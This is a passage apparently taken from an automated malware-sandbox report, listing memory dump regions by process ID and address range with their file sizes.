                                                                                                                                                    Filesize

                                                                                                                                                    852KB

                                                                                                                                                  • memory/2140-213-0x0000000000C10000-0x0000000000C11000-memory.dmp

                                                                                                                                                    Filesize

                                                                                                                                                    4KB

                                                                                                                                                  • memory/2140-217-0x0000000000230000-0x000000000023E000-memory.dmp

                                                                                                                                                    Filesize

                                                                                                                                                    56KB

                                                                                                                                                  • memory/2140-215-0x0000000000210000-0x0000000000211000-memory.dmp

                                                                                                                                                    Filesize

                                                                                                                                                    4KB

                                                                                                                                                  • memory/2140-226-0x0000000000240000-0x0000000000241000-memory.dmp

                                                                                                                                                    Filesize

                                                                                                                                                    4KB

                                                                                                                                                  • memory/2232-222-0x00000000012D0000-0x00000000012D1000-memory.dmp

                                                                                                                                                    Filesize

                                                                                                                                                    4KB

                                                                                                                                                  • memory/2232-228-0x0000000004C60000-0x0000000004C61000-memory.dmp

                                                                                                                                                    Filesize

                                                                                                                                                    4KB

                                                                                                                                                  • memory/2308-298-0x0000000000400000-0x00000000004E5000-memory.dmp

                                                                                                                                                    Filesize

                                                                                                                                                    916KB

                                                                                                                                                  • memory/2308-297-0x0000000001F00000-0x0000000001FE1000-memory.dmp

                                                                                                                                                    Filesize

                                                                                                                                                    900KB

                                                                                                                                                  • memory/2376-286-0x0000000000A06000-0x0000000000A25000-memory.dmp

                                                                                                                                                    Filesize

                                                                                                                                                    124KB

                                                                                                                                                  • memory/2376-281-0x0000000000A00000-0x0000000000A02000-memory.dmp

                                                                                                                                                    Filesize

                                                                                                                                                    8KB

                                                                                                                                                  • memory/2396-231-0x0000000001160000-0x0000000001161000-memory.dmp

                                                                                                                                                    Filesize

                                                                                                                                                    4KB

                                                                                                                                                  • memory/2396-236-0x0000000000B30000-0x0000000000B31000-memory.dmp

                                                                                                                                                    Filesize

                                                                                                                                                    4KB

                                                                                                                                                  • memory/2404-275-0x0000000000400000-0x0000000000416000-memory.dmp

                                                                                                                                                    Filesize

                                                                                                                                                    88KB

                                                                                                                                                  • memory/2416-278-0x0000000000260000-0x0000000000261000-memory.dmp

                                                                                                                                                    Filesize

                                                                                                                                                    4KB

                                                                                                                                                  • memory/2520-295-0x0000000000B56000-0x0000000000B75000-memory.dmp

                                                                                                                                                    Filesize

                                                                                                                                                    124KB

                                                                                                                                                  • memory/2520-277-0x0000000000B50000-0x0000000000B52000-memory.dmp

                                                                                                                                                    Filesize

                                                                                                                                                    8KB

                                                                                                                                                  • memory/2520-299-0x0000000000B75000-0x0000000000B76000-memory.dmp

                                                                                                                                                    Filesize

                                                                                                                                                    4KB

                                                                                                                                                  • memory/2604-280-0x0000000002FF0000-0x00000000030F6000-memory.dmp

                                                                                                                                                    Filesize

                                                                                                                                                    1.0MB

                                                                                                                                                  • memory/2604-285-0x0000000001C90000-0x0000000001CAA000-memory.dmp

                                                                                                                                                    Filesize

                                                                                                                                                    104KB

                                                                                                                                                  • memory/2604-241-0x0000000000060000-0x00000000000AB000-memory.dmp

                                                                                                                                                    Filesize

                                                                                                                                                    300KB

                                                                                                                                                  • memory/2604-242-0x0000000000220000-0x0000000000291000-memory.dmp

                                                                                                                                                    Filesize

                                                                                                                                                    452KB

                                                                                                                                                  • memory/2728-254-0x0000000000230000-0x000000000028D000-memory.dmp

                                                                                                                                                    Filesize

                                                                                                                                                    372KB

                                                                                                                                                  • memory/2728-255-0x0000000000400000-0x000000000045D000-memory.dmp

                                                                                                                                                    Filesize

                                                                                                                                                    372KB

                                                                                                                                                  • memory/2744-256-0x0000000002C80000-0x000000000358C000-memory.dmp

                                                                                                                                                    Filesize

                                                                                                                                                    9.0MB

                                                                                                                                                  • memory/2744-257-0x0000000000400000-0x0000000000D26000-memory.dmp

                                                                                                                                                    Filesize

                                                                                                                                                    9.1MB